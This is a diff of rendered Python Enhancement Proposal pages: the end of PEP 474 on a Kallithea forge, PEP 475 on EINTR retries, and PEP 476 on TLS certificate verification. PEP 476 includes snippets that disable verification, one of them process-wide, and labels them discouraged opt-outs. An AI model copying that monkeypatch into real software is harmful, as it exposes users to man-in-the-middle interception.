While the simple “pull request” style workflow made popular by code hosting +sites like GitHub and BitBucket isn’t adequate for the complex branching +model needed for parallel maintenance and development of the various +CPython releases, it’s a good fit for several of the ancillary projects +that surround CPython that we don’t wish to move to a proprietary hosting +site.

+

The key requirements proposed for a PSF provided software forge are:

+
    +
  • MUST support simple “pull request” style workflows
  • +
  • MUST support online editing for simple changes
  • +
  • MUST be backed by an active development organisation (community or +commercial)
  • +
  • MUST support self-hosting of the master repository on PSF infrastructure +without ongoing fees
  • +
+

Additional recommended requirements that are satisfied by this proposal, +but may be negotiable if a sufficiently compelling alternative is presented:

+
    +
  • SHOULD be a fully open source application written in Python
  • +
  • SHOULD support Mercurial (for consistency with existing tooling)
  • +
  • SHOULD support Git (to provide that option to users that prefer it)
  • +
  • SHOULD allow users of git and Mercurial clients to transparently +collaborate on the same repository
  • +
  • SHOULD allow users of GitHub and BitBucket to submit proposed changes using +the standard pull request workflows offered by those tools
  • +
  • SHOULD be open to customisation to meet the needs of CPython core +development, including providing a potential path forward for the +proposed migration to a core reviewer model in PEP 462
  • +
+

The preference for self-hosting without ongoing fees rules out the +free-as-in-beer providers like GitHub and BitBucket, in addition to the +various proprietary source code management offerings.

+

The preference for Mercurial support not only rules out GitHub, but also +other Git-only solutions like GitLab and Gitorious.

+

The hard requirement for online editing support rules out the Apache +Allura/HgForge combination.

+

The preference for a fully open source solution rules out RhodeCode.

+

Of the various options considered by the author of this proposal, that +leaves Kallithea SCM as the proposed +foundation for a forge.python.org service.

+

Kallithea is a full GPLv3 application (derived from the clearly +and unambiguously GPLv3 licensed components of RhodeCode) that is being +developed under the auspices of the Software Freedom Conservancy. The +Conservancy has affirmed that the +Kallithea codebase is completely and validly licensed under GPLv3. In +addition to their role in building the initial Kallithea community, the +Conservancy is also the legal home of both the Mercurial and Git projects. +Other SFC member projects that may be familiar to Python users include +Twisted, Gevent, BuildBot and PyPy.

+
+
+

Intended Benefits

+

The primary benefit of deploying Kallithea as forge.python.org is that +supporting repositories such as the developer guide and the PEP repo could +potentially be managed using pull requests and online editing. This would be +much simpler than the current workflow which requires PEP editors and +other core developers to act as intermediaries to apply updates suggested +by other users.

+

The richer administrative functionality would also make it substantially +easier to grant users access to particular repositories for collaboration +purposes, without having to grant them general access to the entire +installation. This helps lower barriers to entry, as trust can more +readily be granted and earned incrementally, rather than being an +all-or-nothing decision around granting core developer access.

+
+
+

Sustaining Engineering Considerations

+

Even with its current workflow, CPython itself remains one of the largest +open source projects in the world (in the +top 2% +of projects tracked on OpenHub). Unfortunately, we have been significantly +less effective at encouraging contributions to the projects that make up +CPython’s workflow infrastructure, including ensuring that our installations +track upstream, and that wherever feasible, our own customisations are +contributed back to the original project.

+

As such, a core component of this proposal is to actively engage with the +upstream Kallithea community to lower the barriers to working with and on +the Kallithea SCM, as well as with the PSF Infrastructure team to ensure +the forge.python.org service integrates cleanly with the PSF’s infrastructure +automation.

+

This approach aims to provide a number of key benefits:

+
    +
  • allowing those of us contributing to maintenance of this service to be +as productive as possible in the time we have available
  • +
  • offering a compelling professional development opportunity to those +volunteers that choose to participate in maintenance of this service
  • +
  • making the Kallithea project itself more attractive to other potential +users by making it as easy as possible to adopt, deploy and manage
  • +
  • as a result of the above benefits, attracting sufficient contributors both +in the upstream Kallithea community, and within the CPython infrastructure +community, to allow the forge.python.org service to evolve effectively to +meet changing developer expectations
  • +
+

Some initial steps have already been taken to address these sustaining +engineering concerns:

+
    +
  • Tymoteusz Jankowski has been working with Donald Stufft to work out what +would be involved +in deploying Kallithea using the PSF’s Salt based infrastructure automation.
  • +
  • Graham Dumpleton and I have been working on +making it easy +to deploy demonstration Kallithea instances to the free tier of Red Hat’s open +source hosting service, OpenShift Online. (See the comments on that post, or +the quickstart issue tracker for links to +Graham’s follow on work)
  • +
+

The next major step to be undertaken is to come up with a local development +workflow that allows contributors on Windows, Mac OS X and Linux to run +the Kallithea tests locally, without interfering with the operation of +their own system. The currently planned approach for this is to focus on +Vagrant, which is a popular automated virtual machine management system +specifically aimed at developers running local VMs for testing purposes. +The Vagrant based development guidelines +for OpenShift Origin provide an extended example of the kind of workflow this +approach enables. It’s also worth noting that Vagrant is one of the options +for working with a local build of the main python.org website.

+

If these workflow proposals end up working well for Kallithea, they may also +be worth proposing for use by the upstream projects backing other PSF and +CPython infrastructure services, including Roundup, BuildBot, and the main +python.org web site.

+
+
+

Personal Motivation

+

As of July 2015, I now work for Red Hat as a software development workflow designer and process architect, focusing on the upstream developer experience in Fedora. Two of the key pieces of that experience will be familiar to many web service developers: Docker for local container management, and Vagrant for cross-platform local development VM management. Spending time applying these technologies in multiple upstream contexts helps provide additional insight into what works well and what still needs further improvement to provide a good software development experience that is well integrated on Fedora, but also readily available on other Linux distributions, Windows, and Mac OS X.

+

In relation to code review workflows in particular, the primary code review +workflow management tools I’ve used in my career are +Gerrit (for multi-step code review with fine-grained access control), GitHub +and BitBucket (for basic pull request based workflows), and Rietveld (for +CPython’s optional pre-commit reviews).

+

Kallithea is interesting as a base project to build, as it’s currently a +combined repo hosting and code review management platform, but doesn’t +directly integrate the two by offering online merges. This creates the +opportunity to blend the low barrier to entry benefits of the GitHub/BitBucket +pull request model with the mentoring and task hand-off benefits of Gerrit +in defining an online code merging model for Kallithea in collaboration with +the upstream Kallithea developers.

+
+
+

Technical Concerns and Challenges

+

Introducing a new service into the CPython infrastructure presents a number +of interesting technical concerns and challenges. This section covers several +of the most significant ones.

+
+

Service hosting

+

The default position of this PEP is that the new forge.python.org service +will be integrated into the existing PSF Salt infrastructure and hosted on +the PSF’s Rackspace cloud infrastructure.

+

However, other hosting options will also be considered, in particular, +possible deployment as a Kubernetes hosted web +service on either +Google Container Engine or +the next generation of Red Hat’s +OpenShift Online service, by using either +GCEPersistentDisk or the open source +GlusterFS distributed filesystem +to hold the source code repositories.

+
+
+

Ongoing infrastructure maintenance

+

Ongoing infrastructure maintenance is an area of concern within the PSF, +as we currently lack a system administrator mentorship program equivalent to +the Fedora Infrastructure Apprentice or +GNOME Infrastructure Apprentice +programs.

+

Instead, systems tend to be maintained largely by developers as a part-time +activity on top of their development related contributions, rather than +seeking to recruit folks that are more interested in operations (i.e. +keeping existing systems running well) than they are in development (i.e. +making changes to the services to provide new features or a better user +experience, or to address existing issues).

+

While I’d personally like to see the PSF operating such a program at some +point in the future, I don’t consider setting one up to be a +feasible near term goal. However, I do consider it feasible to continue +laying the groundwork for such a program by extending the PSF’s existing +usage of modern infrastructure technologies like OpenStack and Salt to +cover more services, as well as starting to explore the potential benefits of +containers and container platforms when it comes to maintaining and enhancing +PSF provided services.

+

I also plan to look into the question of whether or not an open source cloud +management platform like ManageIQ may help us +bring our emerging “cloud sprawl” problem across Rackspace, Google, Amazon +and other services more under control.

+
+
+

User account management

+

Ideally we’d like to be able to offer a single account that spans all +python.org services, including Kallithea, Roundup/Rietveld, PyPI and the +back end for the new python.org site, but actually implementing that would +be a distinct infrastructure project, independent of this PEP. (It’s also +worth noting that the fine-grained control of ACLs offered by such a +capability is a prerequisite for setting up an +effective system administrator mentorship program)

+

For the initial rollout of forge.python.org, we will likely create yet another +identity silo within the PSF infrastructure. A potentially superior +alternative would be to add support for python-social-auth to Kallithea, but actually +doing so would not be a requirement for the initial rollout of the service +(the main technical concern there is that Kallithea is a Pylons application +that has not yet been ported to Pyramid, so integration will require either +adding a Pylons backend to python-social-auth, or else embarking on the +Pyramid migration in Kallithea).

+
+ +
+

Integration with Roundup

+

Kallithea provides configurable issue tracker integration. This will need +to be set up appropriately to integrate with the Roundup issue tracker at +bugs.python.org before the initial rollout of the forge.python.org service.

+
+
+

Accepting pull requests on GitHub and BitBucket

+

The initial rollout of forge.python.org would support publication of read-only +mirrors, both on hg.python.org and other services, as that is a relatively +straightforward operation that can be implemented in a commit hook.

+

While a highly desirable feature, accepting pull requests on external +services, and mirroring them as submissions to the master repositories on +forge.python.org is a more complex problem, and would likely not be included +as part of the initial rollout of the forge.python.org service.

+
+
+

Transparent Git and Mercurial interoperability

+

Kallithea’s native support for both Git and Mercurial offers an opportunity +to make it relatively straightforward for developers to use the client +of their choice to interact with repositories hosted on forge.python.org.

+

This transparent interoperability does not exist yet, but running our own +multi-VCS repository hosting service provides the opportunity to make this +capability a reality, rather than passively waiting for a proprietary +provider to deign to provide a feature that likely isn’t in their commercial +interest. There’s a significant misalignment of incentives between open +source communities and commercial providers in this particular area, as even +though offering VCS client choice can significantly reduce community friction +by eliminating the need for projects to make autocratic decisions that force +particular tooling choices on potential contributors, top down enforcement +of tool selection (regardless of developer preference) is currently still +the norm in the corporate and other organisational environments that produce +GitHub and Atlassian’s paying customers.

+

Prior to acceptance, in the absence of transparent interoperability, this PEP +should propose specific recommendations for inclusion in the CPython +developer’s guide section for +git users for creating +pull requests against forge.python.org hosted Mercurial repositories.

+
+
+
+

Pilot Objectives and Timeline

+

[TODO: Update this section for Brett’s revised timeline, which aims to have +a CPython demo repository online by October 31st, to get a better indication +of future capabilities once CPython itself migrates over to the new +system, rather than just the support repos]

+

This proposal is part of Brett Cannon’s current evaluation +of improvement proposals for various aspects of the CPython development +workflow. Key dates in that timeline are:

+
    +
  • Feb 1: Draft proposal published (for Kallithea, this PEP)
  • +
  • Apr 8: Discussion of final proposals at Python Language Summit
  • +
  • May 1: Brett’s decision on which proposal to accept
  • +
  • Sep 13: Python 3.5 released, adopting new workflows for Python 3.6
  • +
+

If this proposal is selected for further development, it is proposed to start +with the rollout of the following pilot deployment:

+
    +
  • a reference implementation operational at kallithea-pilot.python.org, +containing at least the developer guide and PEP repositories. This will +be a “throwaway” instance, allowing core developers and other contributors +to experiment freely without worrying about the long term consequences for +the repository history.
  • +
  • read-only live mirrors of the Kallithea hosted repositories on GitHub and +BitBucket. As with the pilot service itself, these would be temporary repos, +to be discarded after the pilot period ends.
  • +
  • clear documentation on using those mirrors to create pull requests against +Kallithea hosted Mercurial repositories (for the pilot, this will likely +not include using the native pull request workflows of those hosted +services)
  • +
  • automatic linking of issue references in code review comments and commit +messages to the corresponding issues on bugs.python.org
  • +
  • draft updates to PEP 1 explaining the Kallithea-based PEP editing and +submission workflow
  • +
+

The following items would be needed for a production migration, but there +doesn’t appear to be an obvious way to trial an updated implementation as +part of the pilot:

+
    +
  • adjusting the PEP publication process and the developer guide publication +process to be based on the relocated Mercurial repos
  • +
+

The following items would be objectives of the overall workflow improvement +process, but are considered “desirable, but not essential” for the initial +adoption of the new service in September (if this proposal is the one +selected and the proposed pilot deployment is successful):

+
    +
  • allowing the use of python-social-auth to authenticate against the PSF +hosted Kallithea instance
  • +
  • allowing the use of the GitHub and BitBucket pull request workflows to +submit pull requests to the main Kallithea repo
  • +
  • allowing easy triggering of forced BuildBot runs based on Kallithea hosted +repos and pull requests (prior to the implementation of PEP 462, this +would be intended for use with sandbox repos rather than the main CPython +repo)
  • +
+
+
+

Future Implications for CPython Core Development

+

The workflow requirements for the main CPython development repository are +significantly more complex than those for the repositories being discussed +in this PEP. These concerns are covered in more detail in PEP 462.

+

Given Guido’s recommendation to replace Rietveld with a more actively maintained code review system, my current plan is to rewrite that PEP to use Kallithea as the proposed glue layer, with enhanced Kallithea pull requests eventually replacing the current practice of uploading patch files directly to the issue tracker.

+

I’ve also started working with Pierre-Yves David on a custom Mercurial extension that automates some aspects of the CPython core development workflow.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0474.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0475/index.html b/pep-0475/index.html new file mode 100644 index 00000000000..61e4dadc9ca --- /dev/null +++ b/pep-0475/index.html @@ -0,0 +1,560 @@ + + + + + + + + PEP 475 – Retry system calls failing with EINTR | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 475 – Retry system calls failing with EINTR

+
+
Author:
+
Charles-François Natali <cf.natali at gmail.com>, Victor Stinner <vstinner at python.org>
+
BDFL-Delegate:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
29-Jul-2014
+
Python-Version:
+
3.5
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

System call wrappers provided in the standard library should be retried +automatically when they fail with EINTR, to relieve application code +from the burden of doing so.

+

By system calls, we mean the functions exposed by the standard C library +pertaining to I/O or handling of other system resources.

+
+
+

Rationale

+
+

Interrupted system calls

+

On POSIX systems, signals are common. Code calling system calls must be +prepared to handle them. Examples of signals:

+
    +
  • The most common signal is SIGINT, the signal sent when CTRL+c is +pressed. By default, Python raises a KeyboardInterrupt exception +when this signal is received.
  • +
  • When running subprocesses, the SIGCHLD signal is sent when a +child process exits.
  • +
  • Resizing the terminal sends the SIGWINCH signal to the +applications running in the terminal.
  • +
  • Putting the application in background (ex: press CTRL-z and then +type the bg command) sends the SIGCONT signal.
  • +
+

Writing a C signal handler is difficult: only “async-signal-safe” +functions can be called (for example, printf() and malloc() +are not async-signal safe), and there are issues with reentrancy. +Therefore, when a signal is received by a process during the execution +of a system call, the system call can fail with the EINTR error to +give the program an opportunity to handle the signal without the +restriction on signal-safe functions.

+

This behaviour is system-dependent: on certain systems, using the +SA_RESTART flag, some system calls are retried automatically instead +of failing with EINTR. Regardless, Python’s signal.signal() +function clears the SA_RESTART flag when setting the signal handler: +all system calls will probably fail with EINTR in Python.

+

Since receiving a signal is a non-exceptional occurrence, robust POSIX code +must be prepared to handle EINTR (which, in most cases, means +retry in a loop in the hope that the call eventually succeeds). +Without special support from Python, this can make application code +much more verbose than it needs to be.

+
+
+

Status in Python 3.4

+

In Python 3.4, handling the InterruptedError exception (EINTR’s dedicated exception class) is duplicated at every call site on a case-by-case basis. Only a few Python modules actually handle this exception, and fixes have usually taken several years to cover a whole module. Example of code retrying file.read() on InterruptedError:

+
while True:
+    try:
+        data = file.read(size)
+        break
+    except InterruptedError:
+        continue
+
+
+

List of Python modules in the standard library which handle +InterruptedError:

+
    +
  • asyncio
  • +
  • asyncore
  • +
  • io, _pyio
  • +
  • multiprocessing
  • +
  • selectors
  • +
  • socket
  • +
  • socketserver
  • +
  • subprocess
  • +
+

Other programming languages like Perl, Java and Go retry system calls +failing with EINTR at a lower level, so that libraries and applications +needn’t bother.

+
+
+

Use Case 1: Don’t Bother With Signals

+

In most cases, you don’t want to be interrupted by signals and you +don’t expect to get InterruptedError exceptions. For example, do +you really want to write such complex code for a “Hello World” +example?

+
while True:
+    try:
+        print("Hello World")
+        break
+    except InterruptedError:
+        continue
+
+
+

InterruptedError can happen in unexpected places. For example, +os.close() and FileIO.close() may raise InterruptedError: +see the article close() and EINTR.

+

The Python issues related to EINTR section below gives examples of +bugs caused by EINTR.

+

The expectation in this use case is that Python hides the +InterruptedError and retries system calls automatically.

+
+
+

Use Case 2: Be notified of signals as soon as possible

+

Sometimes, however, you expect some signals and you want to handle them as soon as possible. For example, you may want to immediately quit a program using the CTRL+c keyboard shortcut.

+

Besides, some signals are not interesting and should not disrupt the +application. There are two options to interrupt an application on +only some signals:

+
    +
  • Set up a custom signal handler which raises an exception, such as +KeyboardInterrupt for SIGINT.
  • +
  • Use an I/O multiplexing function like select() together with Python’s signal wakeup file descriptor: see the function signal.set_wakeup_fd().
  • +
+

The expectation in this use case is for the Python signal handler to be executed promptly, and for the system call to fail if the handler raised an exception – otherwise, to be restarted.

+
+
+
+

Proposal

+

This PEP proposes to handle EINTR and retries at the lowest level, i.e. +in the wrappers provided by the stdlib (as opposed to higher-level +libraries and applications).

+

Specifically, when a system call fails with EINTR, its Python wrapper +must call the given signal handler (using PyErr_CheckSignals()). +If the signal handler raises an exception, the Python wrapper bails out +and fails with the exception.

+

If the signal handler returns successfully, the Python wrapper retries the +system call automatically. If the system call involves a timeout parameter, +the timeout is recomputed.
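As a rough illustration, the proposed control flow can be sketched in pure Python (the helper name _retry_on_eintr is hypothetical; the real logic lives in the stdlib’s C wrappers, where running the signal handler corresponds to calling PyErr_CheckSignals()):

import time

def _retry_on_eintr(func, *args, timeout=None):
    deadline = None if timeout is None else time.monotonic() + timeout
    while True:
        try:
            if deadline is None:
                return func(*args)
            # The timeout is recomputed before every retry.
            remaining = max(deadline - time.monotonic(), 0.0)
            return func(*args, remaining)
        except InterruptedError:
            # Reaching this point means the Python signal handler ran and
            # returned normally; had it raised, that exception would have
            # propagated to the caller instead. Retry the call.
            continue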

+
+

Modified functions

+

Examples of standard library functions that need to be modified to comply with this PEP:

+
    +
  • open(), os.open(), io.open()
  • +
  • functions of the faulthandler module
  • +
  • os functions:
      +
    • os.fchdir()
    • +
    • os.fchmod()
    • +
    • os.fchown()
    • +
    • os.fdatasync()
    • +
    • os.fstat()
    • +
    • os.fstatvfs()
    • +
    • os.fsync()
    • +
    • os.ftruncate()
    • +
    • os.mkfifo()
    • +
    • os.mknod()
    • +
    • os.posix_fadvise()
    • +
    • os.posix_fallocate()
    • +
    • os.pread()
    • +
    • os.pwrite()
    • +
    • os.read()
    • +
    • os.readv()
    • +
    • os.sendfile()
    • +
    • os.wait3()
    • +
    • os.wait4()
    • +
    • os.wait()
    • +
    • os.waitid()
    • +
    • os.waitpid()
    • +
    • os.write()
    • +
    • os.writev()
    • +
    • special cases: os.close() and os.dup2() now ignore EINTR error, +the syscall is not retried
    • +
    +
  • +
  • select.select(), select.poll.poll(), select.epoll.poll(), +select.kqueue.control(), select.devpoll.poll()
  • +
  • socket.socket() methods:
      +
    • accept()
    • +
    • connect() (except for non-blocking sockets)
    • +
    • recv()
    • +
    • recvfrom()
    • +
    • recvmsg()
    • +
    • send()
    • +
    • sendall()
    • +
    • sendmsg()
    • +
    • sendto()
    • +
    +
  • +
  • signal.sigtimedwait(), signal.sigwaitinfo()
  • +
  • time.sleep()
  • +
+

(Note: the selectors module already retries on InterruptedError, but it doesn’t recompute the timeout yet.)

+

os.close(), the close() methods, and os.dup2() are a special case: they will ignore EINTR instead of retrying. The reason is complex but involves behaviour under Linux and the fact that the file descriptor may really be closed even if EINTR is returned. See articles:

+ +

The socket.socket.connect() method does not retry connect() for non-blocking sockets if it is interrupted by a signal (fails with EINTR); the connection then continues asynchronously in the background. The caller is responsible for waiting until the socket becomes writable (e.g. using select.select()) and then calling socket.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) to check whether the connection succeeded (getsockopt() returns 0) or failed.
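A sketch of that pattern (the host, port and error handling are illustrative only):

import os
import select
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
try:
    sock.connect(("example.com", 80))
except BlockingIOError:
    pass  # the connection continues asynchronously in the background

select.select([], [sock], [])  # wait until the socket becomes writable
err = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
    raise OSError(err, os.strerror(err))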

+
+
+

InterruptedError handling

+

Since interrupted system calls are automatically retried, the +InterruptedError exception should not occur anymore when calling those +system calls. Therefore, manual handling of InterruptedError as +described in Status in Python 3.4 can be removed, which will simplify +standard library code.
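For instance, the retry loop shown in Status in Python 3.4 reduces to a single line:

data = file.read(size)  # EINTR is now handled internally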

+
+
+
+

Backward compatibility

+

Applications relying on the fact that system calls are interrupted +with InterruptedError will hang. The authors of this PEP don’t +think that such applications exist, since they would be exposed to +other issues such as race conditions (there is an opportunity for deadlock +if the signal comes before the system call). Besides, such code would +be non-portable.

+

In any case, those applications must be fixed to handle signals differently, +to have a reliable behaviour on all platforms and all Python versions. +A possible strategy is to set up a signal handler raising a well-defined +exception, or use a wakeup file descriptor.

+

For applications using event loops, signal.set_wakeup_fd() is the recommended option to handle signals. Python’s low-level signal handler will write signal numbers into the file descriptor, and the event loop will be woken up to read them. The event loop can handle those signals without the restrictions of signal handlers (for example, the loop can be woken up in any thread, not just the main thread).

+
+
+

Appendix

+
+

Wakeup file descriptor

+

Since Python 3.3, signal.set_wakeup_fd() writes the signal number +into the file descriptor, whereas it only wrote a null byte before. +It becomes possible to distinguish between signals using the wakeup file +descriptor.
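A minimal sketch of distinguishing signals via the wakeup file descriptor (POSIX-only; SIGUSR1 is an arbitrary example):

import os
import select
import signal
import socket

rsock, wsock = socket.socketpair()
wsock.setblocking(False)
signal.set_wakeup_fd(wsock.fileno())
# A Python-level handler must be installed for the signal to be delivered.
signal.signal(signal.SIGUSR1, lambda signum, frame: None)

os.kill(os.getpid(), signal.SIGUSR1)
ready, _, _ = select.select([rsock], [], [], 1.0)
if ready:
    # Since Python 3.3, one byte per signal number is written.
    print(list(rsock.recv(64)))  # e.g. [10] for SIGUSR1 on Linux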

+

Linux has a signalfd() system call which provides more information on +each signal. For example, it’s possible to know the pid and uid who sent +the signal. This function is not exposed in Python yet (see +issue 12304).

+

On Unix, the asyncio module uses the wakeup file descriptor to +wake up its event loop.

+
+
+

Multithreading

+

A C signal handler can be called from any thread, but Python +signal handlers will always be called in the main Python thread.

+

Python’s C API provides the PyErr_SetInterrupt() function which calls +the SIGINT signal handler in order to interrupt the main Python thread.
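At the Python level this is exposed as _thread.interrupt_main(); a small sketch of interrupting the main thread from a worker thread:

import _thread
import threading
import time

def worker():
    time.sleep(1)
    _thread.interrupt_main()  # schedules SIGINT handling in the main thread

threading.Thread(target=worker).start()
try:
    time.sleep(10)
except KeyboardInterrupt:
    print("main thread interrupted after about 1 second")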

+
+
+

Signals on Windows

+
+

Control events

+

Windows uses “control events”:

+
    +
  • CTRL_BREAK_EVENT: Break (SIGBREAK)
  • +
  • CTRL_CLOSE_EVENT: Close event
  • +
  • CTRL_C_EVENT: CTRL+C (SIGINT)
  • +
  • CTRL_LOGOFF_EVENT: Logoff
  • +
  • CTRL_SHUTDOWN_EVENT: Shutdown
  • +
+

The SetConsoleCtrlHandler() function +can be used to install a control handler.

+

The CTRL_C_EVENT and CTRL_BREAK_EVENT events can be sent to a +process using the GenerateConsoleCtrlEvent() function. +This function is exposed in Python as os.kill().
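For example (Windows-only sketch; the child must be placed in its own process group to receive the event):

import os
import signal
import subprocess
import sys

child = subprocess.Popen(
    [sys.executable, "-c", "import time; time.sleep(30)"],
    creationflags=subprocess.CREATE_NEW_PROCESS_GROUP,
)
# os.kill() wraps GenerateConsoleCtrlEvent() for this event type.
os.kill(child.pid, signal.CTRL_BREAK_EVENT)
child.wait()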

+
+
+

Signals

+

The following signals are supported on Windows:

+
    +
  • SIGABRT
  • +
  • SIGBREAK (CTRL_BREAK_EVENT): signal only available on Windows
  • +
  • SIGFPE
  • +
  • SIGILL
  • +
  • SIGINT (CTRL_C_EVENT)
  • +
  • SIGSEGV
  • +
  • SIGTERM
  • +
+
+
+

SIGINT

+

The default Python signal handler for SIGINT sets a Windows event +object: sigint_event.

+

time.sleep() is implemented with WaitForSingleObjectEx(); it waits on the sigint_event object, using the time.sleep() argument as the timeout, so the sleep can be interrupted by SIGINT.

+

_winapi.WaitForMultipleObjects() automatically adds +sigint_event to the list of watched handles, so it can also be +interrupted.

+

PyOS_StdioReadline() also uses sigint_event when fgets() fails, to check whether Ctrl-C or Ctrl-Z was pressed.

+
+
+ +
+
+

Implementation

+

The implementation is tracked in issue 23285. It was committed on +February 07, 2015.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0475.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0476/index.html b/pep-0476/index.html new file mode 100644 index 00000000000..e99fc52aa00 --- /dev/null +++ b/pep-0476/index.html @@ -0,0 +1,337 @@ + + + + + + + + PEP 476 – Enabling certificate verification by default for stdlib http clients | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 476 – Enabling certificate verification by default for stdlib http clients

+
+
Author:
+
Alex Gaynor <alex.gaynor at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Aug-2014
+
Python-Version:
+
2.7.9, 3.4.3, 3.5
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Currently when a standard library http client (the urllib, urllib2, http, and httplib modules) encounters an https:// URL it will wrap the network HTTP traffic in a TLS stream, as is necessary to communicate with such a server. However, during the TLS handshake it will not actually check that the server’s X509 certificate is signed by a CA in any trust root, nor will it verify that the Common Name (or Subject Alternate Name) on the presented certificate matches the requested host.

+

The failure to do these checks means that anyone with a privileged network +position is able to trivially execute a man in the middle attack against a +Python application using either of these HTTP clients, and change traffic at +will.

+

This PEP proposes to enable verification of X509 certificate signatures, as +well as hostname verification for Python’s HTTP clients by default, subject to +opt-out on a per-call basis. This change would be applied to Python 2.7, Python +3.4, and Python 3.5.

+
+
+

Rationale

+

The “S” in “HTTPS” stands for secure. When Python’s users type “HTTPS” they are expecting a secure connection, and Python should adhere to a reasonable standard of care in delivering this. Currently we are failing at this, and as a result APIs which appear simple are misleading users.

+

When asked, many Python users state that they were not aware that Python failed +to perform these validations, and are shocked.

+

The popularity of requests (which enables these checks by default) +demonstrates that these checks are not overly burdensome in any way, and the +fact that it is widely recommended as a major security improvement over the +standard library clients demonstrates that many expect a higher standard for +“security by default” from their tools.

+

The failure of various applications to note Python’s negligence in this matter +is a source of regular CVE assignment [1] [2] [3] [4] [5] [6] [7] [8] +[9] [10] [11].

+ +
+
+

Technical Details

+

Python would use the system provided certificate database on all platforms. +Failure to locate such a database would be an error, and users would need to +explicitly specify a location to fix it.

+

This will be achieved by adding a new ssl._create_default_https_context +function, which is the same as ssl.create_default_context.

+

http.client can then replace its usage of ssl._create_stdlib_context +with the ssl._create_default_https_context.

+

Additionally ssl._create_stdlib_context is renamed +ssl._create_unverified_context (an alias is kept around for backwards +compatibility reasons).

+
+

Trust database

+

This PEP proposes using the system-provided certificate database. Previous +discussions have suggested bundling Mozilla’s certificate database and using +that by default. This was decided against for several reasons:

+
    +
  • Using the platform trust database imposes a lower maintenance burden on the +Python developers – shipping our own trust database would require doing a +release every time a certificate was revoked.
  • +
  • Linux vendors, and other downstreams, would unbundle the Mozilla +certificates, resulting in a more fragmented set of behaviors.
  • +
  • Using the platform stores makes it easier to handle situations such as +corporate internal CAs.
  • +
+

OpenSSL also has a pair of environment variables, SSL_CERT_DIR and SSL_CERT_FILE, which can be used to point Python at a different certificate database.
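For example, the effective locations (and the names of the overriding environment variables) for a given build can be inspected with:

import ssl

# Shows the default cafile/capath and the SSL_CERT_FILE / SSL_CERT_DIR
# environment variable names recognised by the linked OpenSSL.
print(ssl.get_default_verify_paths())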

+
+
+

Backwards compatibility

+

This change will have the appearance of causing some HTTPS connections to +“break”, because they will now raise an Exception during handshake.

+

This is misleading, however: in fact these connections are presently failing silently. An HTTPS URL indicates an expectation of confidentiality and authentication, and the fact that Python does not actually verify that expectation is met is a bug. Further: “Errors should never pass silently.”

+

Nevertheless, users who have a need to access servers with self-signed or +incorrect certificates would be able to do so by providing a context with +custom trust roots or which disables validation (documentation should strongly +recommend the former where possible). Users will also be able to add necessary +certificates to system trust stores in order to trust them globally.
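For example, a context with a custom trust root might look like this (Python 3 spelling; the CA bundle path and URL are hypothetical):

import ssl
import urllib.request

# Trust a specific (e.g. corporate or self-signed) CA certificate while
# keeping certificate and hostname verification fully enabled.
context = ssl.create_default_context(cafile="internal-ca.pem")
urllib.request.urlopen("https://internal.example.com/", context=context)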

+

Twisted’s 14.0 release made this same change, and it has been met with almost +no opposition.

+
+
+

Opting out

+

For users who wish to opt out of certificate verification on a single +connection, they can achieve this by providing the context argument to +urllib.urlopen:

+
import ssl
+
+# This restores the same behavior as before.
+context = ssl._create_unverified_context()
+urllib.urlopen("https://no-valid-cert", context=context)
+
+
+

It is also possible, though highly discouraged, to globally disable +verification by monkeypatching the ssl module in versions of Python that +implement this PEP:

+
import ssl
+
+try:
+    _create_unverified_https_context = ssl._create_unverified_context
+except AttributeError:
+    # Legacy Python that doesn't verify HTTPS certificates by default
+    pass
+else:
+    # Handle target environment that doesn't support HTTPS verification
+    ssl._create_default_https_context = _create_unverified_https_context
+
+
+

This guidance is aimed primarily at system administrators that wish to adopt +newer versions of Python that implement this PEP in legacy environments that +do not yet support certificate verification on HTTPS connections. For +example, an administrator may opt out by adding the monkeypatch above to +sitecustomize.py in their Standard Operating Environment for Python. +Applications and libraries SHOULD NOT be making this change process wide +(except perhaps in response to a system administrator controlled configuration +setting).

+

Particularly security sensitive applications should always provide an explicit +application defined SSL context rather than relying on the default behaviour +of the underlying Python implementation.

+
+
+
+

Other protocols

+

This PEP only proposes requiring this level of validation for HTTP clients, not +for other protocols such as SMTP.

+

This is because while a high percentage of HTTPS servers have correct +certificates, as a result of the validation performed by browsers, for other +protocols self-signed or otherwise incorrect certificates are far more common. +Note that for SMTP at least, this appears to be changing and should be reviewed +for a potential similar PEP in the future:

+ +
+
+

Python Versions

+

This PEP describes changes that will occur on the 2.7.x, 3.4.x, and 3.5 branches. For 2.7.x this will require backporting the context (SSLContext) argument to httplib, in addition to the features already backported in PEP 466.

+
+
+

Implementation

+
    +
  • LANDED: Issue 22366 adds the +context argument to urlib.request.urlopen.
  • +
  • Issue 22417 implements the substance +of this PEP.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0476.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
